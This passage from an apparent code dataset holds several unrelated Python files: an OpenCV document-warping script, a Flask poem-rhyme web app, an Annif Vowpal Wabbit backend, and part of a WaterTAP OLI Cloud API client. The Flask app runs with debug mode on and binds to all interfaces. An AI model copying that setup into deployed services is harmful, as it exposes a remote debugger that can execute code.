#aprox chain - give us all elemtns non compress in one detail\n\n contours, hierarchy = cv.findContours(img,cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n #cv.drawContours(imgContour, cnt, -1, (252, 132, 3), 3)\n area = cv.contourArea(cnt)\n #contourldx draw all the contour\n if area >5000:\n perimeter = cv.arcLength(cnt,True) #true bcs its closed\n\n #aprox corner points\n approx = cv.approxPolyDP(cnt, 0.02*perimeter, True)\n if area > maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n cv.drawContours(imgContour, biggest, -1, (252, 132, 3), 3)\n\n return biggest\n\n\ndef sorter(myPoints):\n myPoints = myPoints.reshape((4,2))\n myPointsNew = 
np.zeros((4,1,2),np.int32)\n add = myPoints.sum(1)\n #print('add',add)\n\n myPointsNew[0] = myPoints[np.argmin(add)]\n myPointsNew[3] = myPoints[np.argmax(add)]\n diff = np.diff(myPoints,axis=1)\n myPointsNew[1] = myPoints[np.argmin(diff)]\n myPointsNew[2] = myPoints[np.argmax(diff)]\n #print(\"New points\",myPointsNew)\n return myPointsNew\n\n\n\ndef getWarp(img, biggest):\n biggest = sorter(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0, 0], [imageWidth, 0], [0, imageHeight], [imageWidth, imageHeight]])\n\n matrix = cv.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv.warpPerspective(img, matrix, (imageWidth, imageHeight))\n\n imgCropped = imgOutput[20:imgOutput.shape[0]-20,20:imgOutput.shape[1]-20]\n imgCropped = cv.resize(imgCropped,(imageWidth,imageHeight))\n\n return imgCropped\n\ndef preProcessing(img):\n imgGray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n imgBlur = cv.GaussianBlur(imgGray,(5,5),1)\n imgCanny = cv.Canny(imgBlur,150,150)\n kernel = np.ones((3,3))\n imgDial = cv.dilate(imgCanny,kernel,iterations=2)\n imgErode = cv.erode(imgDial,kernel,iterations =1)\n\n return imgErode\n\n\nwhile True:\n #success, img = cap.read()\n\n img = cv.resize(img,(imageWidth,imageHeight))\n imgContour = img.copy()\n imgThreshold = preProcessing(img)\n #cv.imshow('img',imgThreshold)\n biggest = getContours(imgThreshold)\n if biggest.size != 0:\n imgWarped = getWarp(img,biggest)\n cv.imshow('Stacked',stackImages(0.6,[img,imgThreshold,imgWarped]))\n else:\n cv.imshow('Stacked', stackImages(0.6, [img, img, img]))\n #cv.imshow('WebCam',imgWarped)\n #cv.imshow('WebCam',img)\n if cv.waitKey(0) & 0xFF == ord('q'):\n break\n\n\n\n\n","sub_path":"YouTube_OpenCV_3_Hours_Course/project2.py","file_name":"project2.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"38908750","text":"from flask import Flask\nfrom flask import request, render_template\nimport sqlite3\nimport random\nimport re\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n conn = sqlite3.connect('live_poems.bd')\n c = conn.cursor()\n\n if request.args:\n line = request.args[\"line_input\"]\n rhyme, author = find_rhyme(line)\n return render_template(\"main.html\", poem_line=rhyme, author=author, line=\"Вы ввели: {}\".format(line))\n return render_template(\"main.html\", poem_line=\"\", author=\"\", line=\"\")\n\n\ndef find_rhyme(line):\n conn = sqlite3.connect(\"live_poems.bd\")\n c = conn.cursor()\n\n c.execute(\"SELECT line FROM poems\")\n lines = c.fetchall()\n lines = [i[0] for i in lines]\n\n ending = re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", line)[-3:]\n\n appr_lines = [i for i in lines if re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", i).endswith(ending)]\n\n if \"я\" in ending or \"ю\" in ending or \"ё\" in ending:\n ending = ending.replace(\"я\", \"а\").replace(\"ю\", \"у\").replace(\"ё\", \"о\")\n appr_lines.extend([i for i in lines if re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", i).endswith(ending)])\n\n\n if len(appr_lines) != 0:\n res = appr_lines[random.randint(0, len(appr_lines) - 1)]\n\n c.execute(\"SELECT poet FROM poets INNER JOIN poems ON poets.id == poems.author WHERE line==(?)\", (res,))\n author = c.fetchone()[0]\n return res, author\n else:\n return \"ой, стихотворения с такой рифмой не найдено:(\", \"создатель сайта\"\n\n\nif __name__ == '__main__':\n import os\n app.debug = True\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', 
port=port)\n","sub_path":"FinalProject/web_site_flask.py","file_name":"web_site_flask.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"370499602","text":"\"\"\"Annif backend using the Vowpal Wabbit multiclass and multilabel\nclassifiers\"\"\"\n\nimport random\nimport numpy as np\nimport annif.project\nfrom annif.suggestion import ListSuggestionResult, VectorSuggestionResult\nfrom annif.exception import ConfigurationException\nfrom . import vw_base\nfrom . import backend\nfrom . import mixins\n\n\nclass VWMultiBackend(mixins.ChunkingBackend, vw_base.VWBaseBackend):\n \"\"\"Vowpal Wabbit multiclass/multilabel backend for Annif\"\"\"\n\n name = \"vw_multi\"\n needs_subject_index = True\n\n VW_PARAMS = {\n 'bit_precision': (int, None),\n 'ngram': (lambda x: '_{}'.format(int(x)), None),\n 'learning_rate': (float, None),\n 'loss_function': (['squared', 'logistic', 'hinge'], 'logistic'),\n 'l1': (float, None),\n 'l2': (float, None),\n 'passes': (int, None),\n 'probabilities': (bool, None)\n }\n\n SUPPORTED_ALGORITHMS = ('oaa', 'ect', 'log_multi', 'multilabel_oaa')\n\n DEFAULT_INPUTS = '_text_'\n\n DEFAULT_PARAMS = {'algorithm': 'oaa'}\n\n def default_params(self):\n params = backend.AnnifBackend.DEFAULT_PARAMS.copy()\n params.update(mixins.ChunkingBackend.DEFAULT_PARAMS)\n params.update(self.DEFAULT_PARAMS)\n params.update({param: default_val\n for param, (_, default_val) in self.VW_PARAMS.items()\n if default_val is not None})\n return params\n\n @property\n def algorithm(self):\n algorithm = self.params['algorithm']\n if algorithm not in self.SUPPORTED_ALGORITHMS:\n raise ConfigurationException(\n \"{} is not a valid algorithm (allowed: {})\".format(\n algorithm, ', '.join(self.SUPPORTED_ALGORITHMS)),\n backend_id=self.backend_id)\n return algorithm\n\n @property\n def inputs(self):\n inputs = self.params.get('inputs', self.DEFAULT_INPUTS)\n return inputs.split(',')\n\n @staticmethod\n def _cleanup_text(text):\n # colon and pipe chars have special meaning in VW and must be avoided\n return text.replace(':', '').replace('|', '')\n\n def _normalize_text(self, text):\n ntext = ' '.join(self.project.analyzer.tokenize_words(text))\n return VWMultiBackend._cleanup_text(ntext)\n\n def _uris_to_subject_ids(self, uris):\n subject_ids = []\n for uri in uris:\n subject_id = self.project.subjects.by_uri(uri)\n if subject_id is not None:\n subject_ids.append(subject_id)\n return subject_ids\n\n def _format_examples(self, text, uris):\n subject_ids = self._uris_to_subject_ids(uris)\n if self.algorithm == 'multilabel_oaa':\n yield '{} {}'.format(','.join(map(str, subject_ids)), text)\n else:\n for subject_id in subject_ids:\n yield '{} {}'.format(subject_id + 1, text)\n\n def _get_input(self, input, text):\n if input == '_text_':\n return self._normalize_text(text)\n else:\n proj = annif.project.get_project(input)\n result = proj.suggest(text)\n features = [\n '{}:{}'.format(self._cleanup_text(hit.uri), hit.score)\n for hit in result.hits]\n return ' '.join(features)\n\n def _inputs_to_exampletext(self, text):\n namespaces = {}\n for input in self.inputs:\n inputtext = self._get_input(input, text)\n if inputtext:\n namespaces[input] = inputtext\n if not namespaces:\n return None\n return ' '.join(['|{} {}'.format(namespace, featurestr)\n for namespace, featurestr in namespaces.items()])\n\n def _create_examples(self, corpus):\n examples = []\n for doc in corpus.documents:\n text = 
self._inputs_to_exampletext(doc.text)\n if not text:\n continue\n examples.extend(self._format_examples(text, doc.uris))\n random.shuffle(examples)\n return examples\n\n def _create_model(self):\n self.info('creating VW model (algorithm: {})'.format(self.algorithm))\n super()._create_model({self.algorithm: len(self.project.subjects)})\n\n def _convert_result(self, result):\n if self.algorithm == 'multilabel_oaa':\n # result is a list of subject IDs - need to vectorize\n mask = np.zeros(len(self.project.subjects), dtype=np.float32)\n mask[result] = 1.0\n return mask\n elif isinstance(result, int):\n # result is a single integer - need to one-hot-encode\n mask = np.zeros(len(self.project.subjects), dtype=np.float32)\n mask[result - 1] = 1.0\n return mask\n else:\n # result is a list of scores (probabilities or binary 1/0)\n return np.array(result, dtype=np.float32)\n\n def _suggest_chunks(self, chunktexts):\n results = []\n for chunktext in chunktexts:\n\n exampletext = self._inputs_to_exampletext(chunktext)\n if not exampletext:\n continue\n example = ' {}'.format(exampletext)\n result = self._model.predict(example)\n results.append(self._convert_result(result))\n if not results: # empty result\n return ListSuggestionResult(\n hits=[], subject_index=self.project.subjects)\n return VectorSuggestionResult(\n np.array(results, dtype=np.float32).mean(axis=0),\n self.project.subjects)\n","sub_path":"annif/backend/vw_multi.py","file_name":"vw_multi.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"188209656","text":"###############################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n# OLI Systems, Inc. Copyright © 2022, all rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# 3. Neither the name of OLI Systems, Inc. nor the names of any contributors to\n# the software made available herein may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT\n# SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# You are under no obligation whatsoever to provide any bug fixes, patches, or upgrades to the\n# features, functionality or performance of the source code (\"Enhancements\") to anyone; however,\n# if you choose to make your Enhancements available either publicly, or directly to OLI Systems, Inc.,\n# without imposing a separate written license agreement for such Enhancements, then you hereby grant\n# the following license: a non-exclusive, royalty-free perpetual license to install, use, modify, prepare\n# derivative works, incorporate into other computer software, distribute, and sublicense such enhancements\n# or derivative works thereof, in binary and source code form.\n###############################################################################\n\n\"\"\"\nThis class provides methods for using the OLI Cloud API and augments the code provided via\nOLI API documentation. [WIP]\n\nMost of this code was adopted from examples in OLI's documentation, with modifications implemented for\ninterfacing w/WaterTap and addition of other functions for better utilizing OLI API functionality\n\n\"\"\"\n\nimport requests\nimport json\nimport time\nimport getpass\nimport os\n\n# Imports for methods that can be separated from this class and located in another module\nfrom pyomo.environ import units as pyunits, value, Set\nfrom pyomo.util.check_units import check_units_equivalent\nfrom idaes.core.util.exceptions import ConfigurationError\nimport yaml\nimport numpy as np\nfrom copy import deepcopy\n\n\n__author__ = \"Adam Atia, Adi Bannady\"\n\n\nclass OLIApi:\n \"\"\"\n A class to wrap OLI Cloud API calls to be accessible in a simple manner. 
This\n is just an example\n \"\"\"\n\n def __init__(self, username=None, password=None, root_url=None, auth_url=None):\n \"\"\"\n Constructs all necessary attributes for OLIApi class\n\n Args:\n username: user's username\n password: user's password\n root_url: root url\n auth_url: authorization url\n \"\"\"\n if username is None or not len(username):\n username = input(\"Enter OLI username:\\n\")\n if password is None or not len(password):\n password = getpass.getpass(\"Enter OLI user password:\\n\")\n if root_url is None or not len(root_url):\n root_url = input(\"Enter root url:\\n\")\n if auth_url is None or not len(password):\n auth_url = input(\"Enter authorization token:\\n\")\n self.__username = username\n self.__password = password\n self.__jwt_token = \"\"\n self.__refresh_token = \"\"\n self.__root_url = root_url\n self.__auth_url = auth_url\n self.__dbs_url = self.__root_url + \"/channel/dbs\"\n self.__upload_dbs_url = self.__root_url + \"/channel/upload/dbs\"\n\n def login(self, tee=True, fail_flag=True):\n \"\"\"\n Login into user credentials for the OLI Cloud\n\n Args:\n tee: boolean argument to print status code when True\n fail_flag: boolean argument to raise exception upon login failure when True\n Returns: True on success, False on failure\n \"\"\"\n\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n body = {\n \"username\": self.__username,\n \"password\": self.__password,\n \"grant_type\": \"password\",\n \"client_id\": \"apiclient\",\n }\n\n req_result = requests.post(self.__auth_url, headers=headers, data=body)\n\n if req_result.status_code == 200:\n if tee:\n print(f\"Status code is {req_result.status_code}\")\n req_result = req_result.json()\n if \"access_token\" in req_result:\n self.__jwt_token = req_result[\"access_token\"]\n if \"refresh_token\" in req_result:\n self.__refresh_token = req_result[\"refresh_token\"]\n\n return True\n if fail_flag:\n raise Exception(\n f\"OLI login failed. Status code is {req_result.status_code}.\"\n )\n\n return False\n\n def refresh_token(self):\n \"\"\"\n Refreshes the access token using the refresh token got obtained on login\n Returns: True on success, False on failure\n \"\"\"\n\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n body = {\n \"refresh_token\": self.__refresh_token,\n \"grant_type\": \"refresh_token\",\n \"client_id\": \"apiclient\",\n }\n\n req_result = requests.post(self.__auth_url, headers=headers, data=body)\n if req_result.status_code == 200:\n req_result = req_result.json()\n if bool(req_result):\n if \"access_token\" in req_result:\n self.__jwt_token = req_result[\"access_token\"]\n if \"refresh_token\" in req_result:\n self.__refresh_token = req_result[\"refresh_token\"]\n return True\n\n return False\n\n def request_auto_login(self, req_func):\n \"\"\"\n Gets a new access token if the request returns with an expired token error. 
First tries with the refresh token\n if it's still active or simple relogs in using the username and password.\n\n Args:\n req_func: function to call\n Returns: an empty dict if failed\n \"\"\"\n\n num_tries = 1\n while num_tries <= 2:\n\n headers = {\"authorization\": \"Bearer \" + self.__jwt_token}\n\n req_result = req_func(headers)\n if req_result.status_code == 200:\n ret_val = json.loads(req_result.text)\n return ret_val\n elif num_tries == 1 and req_result.status_code == 401:\n req_result = req_result.json()\n if not self.refresh_token():\n if not self.login():\n break\n else:\n break\n num_tries = num_tries + 1\n\n return dict()\n\n def upload_dbs_file(self, file_path):\n \"\"\"\n Uploads a dbs file to the OLI Cloud given a full file path.\n\n Args:\n file_path: full path to dbs file\n Returns: dictionary containing the uploaded file ID\n \"\"\"\n req_result = dict()\n\n # read the file data in\n try:\n with open(file_path, \"rb\") as file:\n files = {\"files\": file}\n\n req_result = self.request_auto_login(\n lambda headers: requests.post(\n self.__upload_dbs_url, headers=headers, files=files\n )\n )\n except IOError:\n pass\n\n return req_result\n\n def get_user_dbs_files(self):\n \"\"\"\n Returns a dictionary containing a list of all user dbs file(s) uploaded\n \"\"\"\n return self.request_auto_login(\n lambda headers: requests.get(self.__dbs_url, headers=headers)\n )\n\n # TODO: put in an extra measure to load an existing DBS instead of constantly regenerating duplicates on the cloud\n def generate_chemistry_file(\n self, function_name, chemistry_model_file_id=\"\", json_input=dict()\n ):\n \"\"\"\n calls chemistry-builder function in the OLI Engine API.\n\n Args:\n function_name: name of function to call\n chemistry_model_file_id: the chemistry model file if for this calculation\n json_input: calculation input JSON\n poll_time: max delay between each call\n max_request: maximum requests\n Returns: dictionary containing result or error\n \"\"\"\n\n # formulate url\n endpoint = \"\"\n method = \"POST\"\n if function_name == \"chemistry-builder\":\n endpoint = self.__root_url + \"/channel/dbs\"\n method = \"POST\"\n elif function_name == \"chemistry-info\":\n endpoint = (\n self.__root_url\n + \"/engine/file/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"GET\"\n else:\n return dict()\n\n # http body\n if bool(json_input):\n data = json.dumps(json_input)\n else:\n data = \"\"\n\n def add_additional_header(headers):\n headers[\"content-type\"] = \"application/json\"\n if method == \"POST\":\n return requests.post(endpoint, headers=headers, data=data)\n\n output = requests.get(endpoint, headers=headers, data=data)\n with open(\"Data/Out.txt\", \"w\") as outfile:\n outfile.write(str(output.text))\n return output\n\n request_result1 = self.request_auto_login(add_additional_header)\n return request_result1\n\n def call(\n self,\n function_name,\n chemistry_model_file_id,\n json_input=dict(),\n poll_time=1.0,\n max_request=1000,\n tee=False,\n ):\n \"\"\"\n calls a function in the OLI Engine API.\n\n Args:\n function_name: name of function to call\n chemistry_model_file_id: the chemistry model file if for this calculation\n json_input: calculation input JSON\n poll_time: max delay between each call\n max_request: maximum requests\n tee: boolean argument to hide or display print messages\n Returns: dictionary containing result or error\n \"\"\"\n\n # formulate url\n endpoint = \"\"\n method = \"POST\"\n if (\n function_name == \"chemistry-info\"\n or 
function_name == \"corrosion-contact-surface\"\n ):\n endpoint = (\n self.__root_url\n + \"/engine/file/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"GET\"\n else:\n endpoint = (\n self.__root_url\n + \"/engine/flash/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"POST\"\n\n # http body\n if bool(json_input):\n data = json.dumps(json_input)\n else:\n data = \"\"\n\n def add_additional_header(headers):\n headers[\"content-type\"] = \"application/json\"\n if method == \"POST\":\n return requests.post(endpoint, headers=headers, data=data)\n\n output = requests.get(endpoint, headers=headers, data=data)\n\n return output\n\n # first call\n results_link = \"\"\n start_time = time.time()\n request_result1 = self.request_auto_login(add_additional_header)\n end_time = time.time()\n request_time = end_time - start_time\n if tee:\n print(\"First request time =\", request_time)\n if bool(request_result1):\n if request_result1[\"status\"] == \"SUCCESS\":\n if \"data\" in request_result1:\n if \"status\" in request_result1[\"data\"]:\n if (\n request_result1[\"data\"][\"status\"] == \"IN QUEUE\"\n or request_result1[\"data\"][\"status\"] == \"IN PROGRESS\"\n ):\n if \"resultsLink\" in request_result1[\"data\"]:\n results_link = request_result1[\"data\"][\"resultsLink\"]\n if tee:\n print(results_link)\n\n # error in getting results link\n if results_link == \"\":\n return dict()\n\n # poll on results link until success\n data = \"\"\n endpoint = results_link\n method = \"GET\"\n request_iter = 0\n while True:\n # make request and time\n start_time = time.time()\n request_result2 = self.request_auto_login(add_additional_header)\n end_time = time.time()\n request_time = end_time - start_time\n if tee:\n print(\"Second request time =\", request_time)\n\n # check if max requests exceeded\n request_iter = request_iter + 1\n if request_iter > max_request:\n break\n\n # extract\n if tee:\n print(request_result2)\n if bool(request_result2):\n if \"status\" in request_result2:\n status = request_result2[\"status\"]\n if tee:\n print(status)\n if status == \"PROCESSED\" or status == \"FAILED\":\n if \"data\" in request_result2:\n return request_result2[\"data\"]\n else:\n break\n elif status == \"IN QUEUE\" or status == \"IN PROGRESS\":\n if poll_time > request_time:\n time.sleep(poll_time - request_time)\n continue\n else:\n break\n else:\n break\n else:\n break\n\n return dict()\n\n # TODO: check this. 
Adding this function to easily access job id\n def get_flash_history(self, dbs_file_id):\n \"\"\"\n Retrieves history of flash information, e.g., input for a chemistry model\n Args:\n dbs_file_id: the DBS file ID\n Returns: dictionary containing array of submitted jobs, from which the jobID and input data can be obtained\n \"\"\"\n endpoint = f\"{self.__root_url}/engine/flash/history/{dbs_file_id}\"\n\n return self.request_auto_login(\n lambda headers: requests.get(endpoint, headers=headers)\n )\n\n def get_job_id(self, dbs_file_id):\n \"\"\"\n Retrieves jobID which is useful for troubleshooting with OLI Support Team\n Args:\n dbs_file_id: the DBS file ID\n Returns: OLI jobID\n \"\"\"\n flash_h = self.get_flash_history(dbs_file_id)\n id = flash_h[\"data\"][0][\"jobId\"]\n\n return id\n\n # TODO: add testing for this function\n # TODO: check if DBS exists --> if a suitable one exists, use that and do NOT create a new one\n def get_dbs_file_id(\n self,\n dbs_file_path=None,\n ions=None,\n phases=None,\n thermo_framework=None,\n model_name=None,\n ):\n \"\"\"\n Returns the chemistry file ID (dbs_file_id) from either\n (1) creating a DBS dict that requires ion names and is then fed to chemistry-builder or\n (2) an uploaded DBS via the \"manual\" workflow without using chemistry-builder\n\n Args:\n dbs_file_path: file path to DBS file.\n ions: ion names as pyomo set\n Returns: chemistry file ID as a string\n \"\"\"\n if dbs_file_path is not None and ions is not None:\n raise IOError(\n \"Either provide a list, dict or Pyomo set of OLI-compatible names\"\n \" or set dbs_file_path to a path to dbs file already generated, but not both.\"\n )\n if dbs_file_path is not None:\n if not os.path.isfile(dbs_file_path) and not os.path.islink(dbs_file_path):\n raise OSError(\n \"Could not find requested path to file. Please \"\n \"check that this path to file exists.\"\n )\n result = self.upload_dbs_file(dbs_file_path)\n chemistry_file_id = result[\"file\"][0][\"id\"]\n return chemistry_file_id\n else:\n # TODO: Check for folder with chemistry_file_id, prompt user to use existing file ID or continue with new, save new to chemistr_file_ID folder for later use\n data = self.create_dbs_dict(ions, phases, thermo_framework, model_name)\n chemistry_file = self.generate_chemistry_file(\"chemistry-builder\", \"\", data)\n if len(chemistry_file) > 0:\n return chemistry_file[\"data\"][\"id\"]\n else:\n raise OSError(\n \"The OLI API didn't return any result. 
Either input was \"\n \"incorrectly provided, or there is a temporary issue with \"\n \"the OLI Cloud API\"\n )\n\n ########################################################################################################\n # Methods that can be separated from this class and placed in a different module\n # TODO: add testing for this function\n def create_dbs_dict(\n self, ions=None, phases=None, thermo_framework=None, model_name=None\n ):\n \"\"\"\n Creates dict for chemistry-builder to later generate a DBS file ID\n Args:\n ions: OLI-compatible ion names as a Pyomo Set, list, or dict where the keys are ion names\n phases: OLI-compatible phases; if None, use default of liquid1 and solid\n Returns: dbs_dict: dictionary in OLI format needed to generate chemistry [DBS] file ID\n\n #TODO: support not None for phases\n \"\"\"\n\n if phases is None:\n phase_lst = [\"liquid1\", \"solid\"]\n if thermo_framework is None:\n thermo_framework = \"MSE (H3O+ ion)\"\n if model_name is None:\n model_name = \"testModel\"\n\n if ions is None:\n raise IOError(\n 'Provide a list, dict, or Pyomo set of OLI-compatible ion names (e.g., \"NAION\")'\n )\n tmp_dict = {}\n ion_lst = []\n if isinstance(ions, Set):\n for ion in ions:\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n elif isinstance(ions, dict):\n for ion in ions.keys():\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n elif isinstance(ions, list):\n for ion in ions:\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n\n dbs_data = {\n \"method\": \"chemistrybuilder.generateDBS\",\n \"params\": {\n \"thermodynamicFramework\": thermo_framework, # TODO: make this an option\n \"modelName\": model_name, # TODO: make this an option\n \"phases\": phase_lst, # TODO: make this an option\n \"inflows\": ion_lst, # TODO: make test for this\n \"unitSetInfo\": { # TODO: UnitSetInfo doesn't seem to be working in API\n \"tds\": \"mg/L\",\n # \"solid_phs_comp\": \"g/g\"\n },\n },\n }\n return dbs_data\n\n # TODO: this needs more thought on dealing with a stateblock\n # - add testing for this function\n def create_input_dict(\n self, stateblock, time_point=None, AllowSolidsToForm=False, zero_species=None\n ):\n \"\"\"\n Creates dict for call function that performs calculations via OLI Cloud API\n stateblock: stateblock that contains ion concentrations, ion charge, temp and pressure\n time_point: stateblock time dimension\n \"\"\"\n if time_point is None:\n time_point = 0\n if zero_species is not None:\n for comp in zero_species:\n if comp not in stateblock[time_point].component_list:\n raise ConfigurationError(\n f\"{comp} was specified in zero_species but is not included in the components provided.\"\n )\n tmp_list = []\n tmp_dict = {}\n\n # TODO: need to check indexes and whether should be conc_mass_comp or conc_mass_phase_comp\n # - for now, expecting conc_mass_phase_comp\n for (p, j), val in stateblock[time_point].conc_mass_phase_comp.items():\n if j != \"H2O\":\n if stateblock[time_point].charge_comp[j].value < 0:\n tmp_dict.update({\"group\": \"Anions\"})\n elif stateblock[time_point].charge_comp[j].value > 0:\n tmp_dict.update({\"group\": \"Cations\"})\n elif stateblock[time_point].charge_comp[j].value == 0:\n tmp_dict.update({\"group\": \"Neutrals\"})\n else:\n raise ConfigurationError(\n \"Each ion, solute, or other component should have a 'charge_comp' property \"\n \"for charge. 
A value of 0 should be assigned for neutral species.\"\n )\n\n tmp_dict.update({\"name\": j})\n tmp_dict.update({\"unit\": \"mg/L\"})\n\n if check_units_equivalent(val, pyunits.kg / pyunits.m**3):\n conc_tmp = pyunits.convert(val, to_units=pyunits.mg / pyunits.L)\n tmp_dict.update({\"value\": value(conc_tmp)})\n if zero_species is not None:\n if j in zero_species:\n tmp_dict.update({\"value\": 0})\n tmp_dict.update(\n {\"charge\": value(stateblock[time_point].charge_comp[j])}\n )\n tmp_list.append(tmp_dict.copy())\n tmp_list.append(\n {\n \"group\": \"Properties\",\n \"name\": \"Temperature\",\n \"unit\": \"°C\",\n \"value\": value(\n pyunits.convert_temp_K_to_C(\n value(stateblock[time_point].temperature)\n )\n ),\n }\n ) # TODO: conditional to check temp units and convert\n tmp_list.append(\n {\n \"group\": \"Properties\",\n \"name\": \"Pressure\",\n \"unit\": \"Pa\",\n \"value\": value(stateblock[time_point].pressure),\n }\n ) # TODO: conditional to check pressure units and convert\n tmp_list.append(\n {\n \"group\": \"Electroneutrality Options\",\n \"name\": \"ElectroNeutralityBalanceType\",\n \"value\": \"DominantIon\", # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"CalcType\",\n \"value\": \"EquilCalcOnly\", # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"CalcAlkalnity\",\n \"value\": False, # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"AllowSolidsToForm\",\n \"value\": AllowSolidsToForm, # TODO: add argument to choose this\n }\n )\n\n input_dict = {\n \"params\": {\n \"waterAnalysisInputs\": tmp_list,\n \"optionalProperties\": {\n \"scalingIndex\": True, # TODO: add argument to add properties\n \"scalingTendencies\": True,\n \"kValuesMBased\": True,\n },\n \"unitSetInfo\": { # TODO: UnitSetInfo doesn't seem to be working in API\n \"tds\": \"mg/L\",\n \"solid_phs_comp\": \"g/g\",\n \"liquid_phs_comp\": \"mg/L\",\n },\n }\n }\n\n return input_dict\n\n def composition_survey(\n self,\n survey=None,\n chemistry_file_ID=None,\n input_dict=None,\n stateblock=None,\n time_point=None,\n AllowSolidsToForm=False,\n zero_species=None,\n tee=True,\n ):\n \"\"\"\n This method allows the user to conduct an OLI composition survey.\n A survey can be conducted over as many components as desired, hypothetically, enabled by _recursive_survey().\n\n Args:\n survey: dictionary with component name as the key, and the min, max, and number of samples (corresponding to start, stop, and num args in numpy linspace)\n e.g.: {\"CAOH2\": (0, 350, 3), \"NA2CO3\": (0, 350, 3), \"NAION\": (10000,20000,3),}\n chemistry_file_ID: OLI chemistry file ID (i.e., DBS file ID)\n input_dict: dictionary with input concentration data for call function which runs calculations in OLI Cloud API\n\n Returns:\n final_results: OLI results\n inflows: inflow data used in OLI calculations\n\n \"\"\"\n if chemistry_file_ID is not None:\n if input_dict is not None:\n if survey is not None:\n vec_list = []\n index_list = []\n num_loops = len(survey)\n for i, key in enumerate(survey.keys()):\n vec_list.append(\n np.linspace(\n survey[key][0], survey[key][1] + 1, survey[key][2]\n )\n )\n index_list.append(\n next(\n (\n i\n for i, item in enumerate(\n input_dict[\"params\"][\"waterAnalysisInputs\"]\n )\n if item[\"name\"] == key\n ),\n None,\n )\n )\n if index_list[i] is None:\n raise ConfigurationError(\n f\"{key} was not found 
in the components specified in your chemistry file. "\n f"Check the name of the component {key} and make sure it matches the "\n f"intended component."\n )\n final_results, inflows = self._recursive_survey(\n vec_list,\n index_list,\n number_surveys=num_loops - 1,\n chemistry_file_ID=chemistry_file_ID,\n input_dict=input_dict,\n tee=tee,\n )\n\n return final_results, inflows\n\n def _recursive_survey(\n self,\n vec_list,\n index_list,\n number_surveys,\n chemistry_file_ID,\n input_dict,\n results=None,\n tee=True,\n inflows=None,\n ):\n \"\"\"\n Recursive function to enable user-defined number of composition surveys\n \"\"\"\n if results is None:\n results = []\n if inflows is None:\n inflows = []\n\n if number_surveys >= 1:\n for val in vec_list[number_surveys]:\n input_dict[\"params\"][\"waterAnalysisInputs\"][index_list[number_surveys]][\n \"value\"\n ] = val\n\n self._recursive_survey(\n vec_list,\n index_list,\n number_surveys - 1,\n chemistry_file_ID,\n input_dict,\n results=results,\n tee=tee,\n inflows=inflows,\n )\n\n else:\n for val in vec_list[number_surveys]:\n input_dict[\"params\"][\"waterAnalysisInputs\"][index_list[number_surveys]][\n \"value\"\n ] = val\n inflows.append(deepcopy(input_dict))\n if tee:\n print(input_dict)\n results.append(\n self.call(\"wateranalysis\", chemistry_file_ID, 